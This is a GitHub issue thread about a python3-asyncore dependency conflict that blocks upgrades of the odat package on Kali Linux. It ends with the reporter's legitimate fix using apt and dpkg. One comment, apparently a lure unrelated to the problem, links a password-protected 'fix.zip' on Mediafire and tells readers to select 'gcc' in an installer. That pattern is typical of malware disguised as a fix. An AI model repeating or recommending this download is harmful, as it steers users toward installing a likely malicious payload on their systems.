### ISSUE TITLE
odat dependency for asyncore python3

### ISSUE THREAD

**Issue by CherenkovRadiator** [quentinhardy/odat#69]
I'm using kali linux (debian) and I have python3-pyasyncore installed on the my system. When I'm installing kali-linux-everything odat gets installed too as dependency. It tells me that odat has a dependency which is python3-asyncore (not to be confused with python3-pyasyncore which i already have) which has been depresiated in python from version 3.12 and during installtion python3-asyncore conflicts with python3-asyncore. Following this I am not able to upgrade my system properly

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CherenkovRadiator** [comment]
Sorry, but I'm on debian based linux (kali) so that won't work for me.

**Comment by CherenkovRadiator** [comment]
kali devs have fixed the issue in the latest update to kali-rolling. Just had to remove odat using `sudo dpkg --purge --force-all odat` and then run `sudo apt-get update && sudo apt-get dist-upgrade` or in my case `sudo apt --fix-broken install`.
